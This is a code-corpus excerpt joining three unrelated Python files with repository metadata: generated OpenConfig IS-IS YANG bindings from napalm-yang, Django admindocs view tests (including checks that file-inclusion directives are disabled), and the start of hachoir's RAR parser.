"generated-type": """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADDRESS_FAMILY': {}, 'BACKUP': {}, 'VALUE': {}, 'LOCAL': {}, 'SET': {}},)), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__flags = t
if hasattr(self, "_set"):
self._set()
def _unset_flags(self):
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
value = __builtin__.property(_get_value)
flags = __builtin__.property(_get_flags)
weight = __builtin__.property(_get_weight)
_pyangbind_elements = OrderedDict(
[("value", value), ("flags", flags), ("weight", weight)]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/adjacency-sid/sid/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters of Adjacency-SID.
"""
__slots__ = ("_path_helper", "_extmethods", "__value", "__flags", "__weight")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"adjacency-sid",
"sid",
"state",
]
def _get_value(self):
"""
Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
YANG Description: Adjacency-SID value.
"""
return self.__value
def _set_value(self, v, load=False):
"""
Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_value is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_value() directly.
YANG Description: Adjacency-SID value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """value must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__value = t
if hasattr(self, "_set"):
self._set()
def _unset_value(self):
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_flags(self):
"""
Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
YANG Description: Flags associated with Adj-Segment-ID.
"""
return self.__flags
def _set_flags(self, v, load=False):
"""
Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_flags is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_flags() directly.
YANG Description: Flags associated with Adj-Segment-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """flags must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADDRESS_FAMILY': {}, 'BACKUP': {}, 'VALUE': {}, 'LOCAL': {}, 'SET': {}},)), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__flags = t
if hasattr(self, "_set"):
self._set()
def _unset_flags(self):
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/weight (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: Value that represents the weight of the Adj-SID for the purpose
of load balancing.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
value = __builtin__.property(_get_value)
flags = __builtin__.property(_get_flags)
weight = __builtin__.property(_get_weight)
_pyangbind_elements = OrderedDict(
[("value", value), ("flags", flags), ("weight", weight)]
)
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs_/adjacency_sid/sid/state/__init__.py
|
Python
|
apache-2.0
| 30,567 | 0.001374 |
import sys
import unittest
from django.conf import settings
from django.contrib.admindocs import utils, views
from django.contrib.admindocs.views import get_return_data_type, simplify_regex
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import fields
from django.test import SimpleTestCase, modify_settings, override_settings
from django.test.utils import captured_stderr
from django.urls import reverse
from .models import Company, Person
from .tests import AdminDocsTestCase, TestDataMixin
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewTests(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_index(self):
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(response, '<h1>Documentation</h1>', html=True)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
self.client.logout()
response = self.client.get(reverse('django-admindocs-docroot'), follow=True)
# Should display the login screen
self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True)
def test_bookmarklets(self):
response = self.client.get(reverse('django-admindocs-bookmarklets'))
self.assertContains(response, '/admindocs/views/')
def test_templatetag_index(self):
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True)
def test_templatefilter_index(self):
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True)
def test_view_index(self):
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>',
html=True
)
self.assertContains(response, 'Views by namespace test')
self.assertContains(response, 'Name: <code>test:func</code>.')
def test_view_index_with_method(self):
"""
Views that are methods are listed correctly.
"""
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>',
html=True
)
def test_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView'])
response = self.client.get(url)
# View docstring
self.assertContains(response, 'Base view for admindocs views.')
@override_settings(ROOT_URLCONF='admin_docs.namespace_urls')
def test_namespaced_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass'])
response = self.client.get(url)
self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>')
def test_view_detail_illegal_import(self):
url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view'])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_view_detail_as_method(self):
"""
Views that are methods can be displayed.
"""
url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index'])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_model_index(self):
response = self.client.get(reverse('django-admindocs-models-index'))
self.assertContains(
response,
'<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>',
html=True
)
def test_template_detail(self):
response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html']))
self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True)
def test_missing_docutils(self):
utils.docutils_is_available = False
try:
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(
response,
'<h3>The admin documentation system requires Python\'s '
'<a href="http://docutils.sf.net/">docutils</a> library.</h3>',
html=True
)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
finally:
utils.docutils_is_available = True
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
@override_settings(SITE_ID=None) # will restore SITE_ID after the test
def test_no_sites_framework(self):
"""
Without the sites framework, should not access SITE_ID or Site
objects. Deleting settings is fine here as UserSettingsHolder is used.
"""
Site.objects.all().delete()
del settings.SITE_ID
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(response, 'View documentation')
@override_settings(TEMPLATES=[{
'NAME': 'ONE',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}, {
'NAME': 'TWO',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}])
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewWithMultipleEngines(AdminDocViewTests):
def test_templatefilter_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<title>Template filters</title>', html=True)
def test_templatetag_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<title>Template tags</title>', html=True)
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class TestModelDetailView(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
with captured_stderr() as self.docutils_stderr:
self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person']))
def test_method_excludes(self):
"""
Methods that begin with strings defined in
``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE``
shouldn't be displayed in the admin docs.
"""
self.assertContains(self.response, "<td>get_full_name</td>")
self.assertNotContains(self.response, "<td>_get_full_name</td>")
self.assertNotContains(self.response, "<td>add_image</td>")
self.assertNotContains(self.response, "<td>delete_image</td>")
self.assertNotContains(self.response, "<td>set_status</td>")
self.assertNotContains(self.response, "<td>save_changes</td>")
def test_methods_with_arguments(self):
"""
Methods that take arguments should also displayed.
"""
self.assertContains(self.response, "<h3>Methods with arguments</h3>")
self.assertContains(self.response, "<td>rename_company</td>")
self.assertContains(self.response, "<td>dummy_function</td>")
self.assertContains(self.response, "<td>suffix_company_name</td>")
def test_methods_with_arguments_display_arguments(self):
"""
Methods with arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>new_name</td>")
def test_methods_with_arguments_display_arguments_default_value(self):
"""
Methods with keyword arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>suffix='ltd'</td>")
def test_methods_with_multiple_arguments_display_arguments(self):
"""
Methods with multiple arguments should have all their arguments
displayed, but omitting 'self'.
"""
self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>")
def test_method_data_types(self):
company = Company.objects.create(name="Django")
person = Person.objects.create(first_name="Human", last_name="User", company=company)
self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integer')
self.assertEqual(get_return_data_type(person.get_groups_list.__name__), 'List')
def test_descriptions_render_correctly(self):
"""
The ``description`` field should render correctly for each field type.
"""
# help text in fields
self.assertContains(self.response, "<td>first name - The person's first name</td>")
self.assertContains(self.response, "<td>last name - The person's last name</td>")
# method docstrings
self.assertContains(self.response, "<p>Get the full name of the person</p>")
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
markup = '<p>the related %s object</p>'
company_markup = markup % (link % ("admin_docs.company", "admin_docs.Company"))
# foreign keys
self.assertContains(self.response, company_markup)
# foreign keys with help text
self.assertContains(self.response, "%s\n - place of work" % company_markup)
# many to many fields
self.assertContains(
self.response,
"number of related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
self.assertContains(
self.response,
"all related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
# "raw" and "include" directives are disabled
self.assertContains(self.response, '<p>"raw" directive disabled.</p>',)
self.assertContains(self.response, '.. raw:: html\n :file: admin_docs/evilfile.txt')
self.assertContains(self.response, '<p>"include" directive disabled.</p>',)
self.assertContains(self.response, '.. include:: admin_docs/evilfile.txt')
out = self.docutils_stderr.getvalue()
self.assertIn('"raw" directive disabled', out)
self.assertIn('"include" directive disabled', out)
def test_model_with_many_to_one(self):
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
response = self.client.get(
reverse('django-admindocs-models-detail', args=['admin_docs', 'company'])
)
self.assertContains(
response,
"number of related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
self.assertContains(
response,
"all related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
def test_model_with_no_backward_relations_render_only_relevant_fields(self):
"""
A model with ``related_name`` of `+` shouldn't show backward
relationship links.
"""
response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'family']))
fields = response.context_data.get('fields')
self.assertEqual(len(fields), 2)
def test_model_docstring_renders_correctly(self):
summary = (
'<h2 class="subhead"><p>Stores information about a person, related to <a class="reference external" '
'href="/admindocs/models/myapp.company/">myapp.Company</a>.</p></h2>'
)
subheading = '<p><strong>Notes</strong></p>'
body = '<p>Use <tt class="docutils literal">save_changes()</tt> when saving this object.</p>'
model_body = (
'<dl class="docutils"><dt><tt class="'
'docutils literal">company</tt></dt><dd>Field storing <a class="'
'reference external" href="/admindocs/models/myapp.company/">'
'myapp.Company</a> where the person works.</dd></dl>'
)
self.assertContains(self.response, 'DESCRIPTION')
self.assertContains(self.response, summary, html=True)
self.assertContains(self.response, subheading, html=True)
self.assertContains(self.response, body, html=True)
self.assertContains(self.response, model_body, html=True)
def test_model_detail_title(self):
self.assertContains(self.response, '<h1>admin_docs.Person</h1>', html=True)
class CustomField(models.Field):
description = "A custom field type"
class DescriptionLackingField(models.Field):
pass
class TestFieldType(unittest.TestCase):
def setUp(self):
pass
def test_field_name(self):
with self.assertRaises(AttributeError):
views.get_readable_field_data_type("NotAField")
def test_builtin_fields(self):
self.assertEqual(
views.get_readable_field_data_type(fields.BooleanField()),
'Boolean (Either True or False)'
)
def test_custom_fields(self):
self.assertEqual(views.get_readable_field_data_type(CustomField()), 'A custom field type')
self.assertEqual(
views.get_readable_field_data_type(DescriptionLackingField()),
'Field of type: DescriptionLackingField'
)
class AdminDocViewFunctionsTests(SimpleTestCase):
def test_simplify_regex(self):
tests = (
(r'^a', '/a'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)/$', '/<a>/b/<c>/'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>\w+)/b/(\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>\w+)/b/((x|y)\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^(?P<a>(x|y)(\(|\)))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^a/?$', '/a/'),
)
for pattern, output in tests:
self.assertEqual(simplify_regex(pattern), output)
|
auready/django
|
tests/admin_docs/test_views.py
|
Python
|
bsd-3-clause
| 14,791 | 0.003042 |
"""
RAR parser
Status: can only read higher-level attructures
Author: Christophe Gisquet
"""
from hachoir_parser import Parser
from hachoir_core.field import (StaticFieldSet, FieldSet,
Bit, Bits, Enum,
UInt8, UInt16, UInt32, UInt64,
String, TimeDateMSDOS32,
NullBytes, NullBits, RawBytes)
from hachoir_core.text_handler import textHandler, filesizeHandler, hexadecimal
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_parser.common.msdos import MSDOSFileAttr32
from datetime import timedelta
MAX_FILESIZE = 1000 * 1024 * 1024
BLOCK_NAME = {
0x72: "Marker",
0x73: "Archive",
0x74: "File",
0x75: "Comment",
0x76: "Extra info",
0x77: "Subblock",
0x78: "Recovery record",
0x79: "Archive authenticity",
0x7A: "New-format subblock",
0x7B: "Archive end",
}
COMPRESSION_NAME = {
0x30: "Storing",
0x31: "Fastest compression",
0x32: "Fast compression",
0x33: "Normal compression",
0x34: "Good compression",
0x35: "Best compression"
}
OS_MSDOS = 0
OS_WIN32 = 2
OS_NAME = {
0: "MS DOS",
1: "OS/2",
2: "Win32",
3: "Unix",
}
DICTIONARY_SIZE = {
0: "Dictionary size 64 Kb",
1: "Dictionary size 128 Kb",
2: "Dictionary size 256 Kb",
3: "Dictionary size 512 Kb",
4: "Dictionary size 1024 Kb",
7: "File is a directory",
}
def formatRARVersion(field):
"""
Decodes the RAR version stored on 1 byte
"""
return "%u.%u" % divmod(field.value, 10)
def markerFlags(s):
yield UInt16(s, "flags", "Marker flags, always 0x1a21")
commonFlags = (
(Bit, "is_ignorable", "Old versions of RAR should ignore this block when copying data"),
(Bit, "has_added_size", "Additional field indicating additional size"),
)
class ArchiveFlags(StaticFieldSet):
format = (
(Bit, "vol", "Archive volume"),
(Bit, "has_comment", "Whether there is a comment"),
(Bit, "is_locked", "Archive volume"),
(Bit, "is_solid", "Whether files can be extracted separately"),
(Bit, "new_numbering", "New numbering, or compressed comment"), # From unrar
(Bit, "has_authenticity_information", "The integrity/authenticity of the archive can be checked"),
(Bit, "is_protected", "The integrity/authenticity of the archive can be checked"),
(Bit, "is_passworded", "Needs a password to be decrypted"),
(Bit, "is_first_vol", "Whether it is the first volume"),
(Bit, "is_encrypted", "Whether the encryption version is present"),
(NullBits, "internal", 4, "Reserved for 'internal use'"),
) + commonFlags
def archiveFlags(s):
yield ArchiveFlags(s, "flags", "Archiver block flags")
def archiveHeader(s):
yield NullBytes(s, "reserved[]", 2, "Reserved word")
yield NullBytes(s, "reserved[]", 4, "Reserved dword")
def commentHeader(s):
yield filesizeHandler(UInt16(s, "total_size", "Comment header size + comment size"))
yield filesizeHandler(UInt16(s, "uncompressed_size", "Uncompressed comment size"))
yield UInt8(s, "required_version", "RAR version needed to extract comment")
yield UInt8(s, "packing_method", "Comment packing method")
yield UInt16(s, "comment_crc16", "Comment CRC")
def commentBody(s):
size = s["total_size"].value - s.current_size
if size > 0:
yield RawBytes(s, "comment_data", size, "Compressed comment data")
def signatureHeader(s):
yield TimeDateMSDOS32(s, "creation_time")
yield filesizeHandler(UInt16(s, "arc_name_size"))
yield filesizeHandler(UInt16(s, "user_name_size"))
def recoveryHeader(s):
yield filesizeHandler(UInt32(s, "total_size"))
yield textHandler(UInt8(s, "version"), hexadecimal)
yield UInt16(s, "rec_sectors")
yield UInt32(s, "total_blocks")
yield RawBytes(s, "mark", 8)
def avInfoHeader(s):
yield filesizeHandler(UInt16(s, "total_size", "Total block size"))
yield UInt8(s, "version", "Version needed to decompress", handler=hexadecimal)
yield UInt8(s, "method", "Compression method", handler=hexadecimal)
yield UInt8(s, "av_version", "Version for AV", handler=hexadecimal)
yield UInt32(s, "av_crc", "AV info CRC32", handler=hexadecimal)
def avInfoBody(s):
size = s["total_size"].value - s.current_size
if size > 0:
yield RawBytes(s, "av_info_data", size, "AV info")
class FileFlags(FieldSet):
static_size = 16
def createFields(self):
yield Bit(self, "continued_from", "File continued from previous volume")
yield Bit(self, "continued_in", "File continued in next volume")
yield Bit(self, "is_encrypted", "File encrypted with password")
yield Bit(self, "has_comment", "File comment present")
yield Bit(self, "is_solid", "Information from previous files is used (solid flag)")
# The 3 following lines are what blocks more staticity
yield Enum(Bits(self, "dictionary_size", 3, "Dictionary size"), DICTIONARY_SIZE)
yield Bit(self, "is_large", "file64 operations needed")
yield Bit(self, "is_unicode", "Filename also encoded using Unicode")
yield Bit(self, "has_salt", "Has salt for encryption")
yield Bit(self, "uses_file_version", "File versioning is used")
yield Bit(self, "has_ext_time", "Extra time info present")
yield Bit(self, "has_ext_flags", "Extra flag ??")
for field in commonFlags:
yield field[0](self, *field[1:])
def fileFlags(s):
yield FileFlags(s, "flags", "File block flags")
class ExtTimeFlags(FieldSet):
static_size = 16
def createFields(self):
for name in ['arctime', 'atime', 'ctime', 'mtime']:
yield Bits(self, "%s_count" % name, 2, "Number of %s bytes" % name)
yield Bit(self, "%s_onesec" % name, "Add one second to the timestamp?")
yield Bit(self, "%s_present" % name, "Is %s extra time present?" % name)
class ExtTime(FieldSet):
def createFields(self):
yield ExtTimeFlags(self, "time_flags")
for name in ['mtime', 'ctime', 'atime', 'arctime']:
if self['time_flags/%s_present' % name].value:
if name != 'mtime':
yield TimeDateMSDOS32(self, "%s" % name, "%s DOS timestamp" % name)
count = self['time_flags/%s_count' % name].value
if count:
yield Bits(self, "%s_remainder" % name, 8 * count, "%s extra precision time (in 100ns increments)" % name)
def createDescription(self):
out = 'Time extension'
pieces = []
for name in ['mtime', 'ctime', 'atime', 'arctime']:
if not self['time_flags/%s_present' % name].value:
continue
if name == 'mtime':
basetime = self['../ftime'].value
else:
basetime = self['%s' % name].value
delta = timedelta()
if self['time_flags/%s_onesec' % name].value:
delta += timedelta(seconds=1)
if '%s_remainder'%name in self:
delta += timedelta(microseconds=self['%s_remainder' % name].value / 10.0)
pieces.append('%s=%s' % (name, basetime + delta))
if pieces:
out += ': ' + ', '.join(pieces)
return out
def specialHeader(s, is_file):
yield filesizeHandler(UInt32(s, "compressed_size", "Compressed size (bytes)"))
yield filesizeHandler(UInt32(s, "uncompressed_size", "Uncompressed size (bytes)"))
yield Enum(UInt8(s, "host_os", "Operating system used for archiving"), OS_NAME)
yield textHandler(UInt32(s, "crc32", "File CRC32"), hexadecimal)
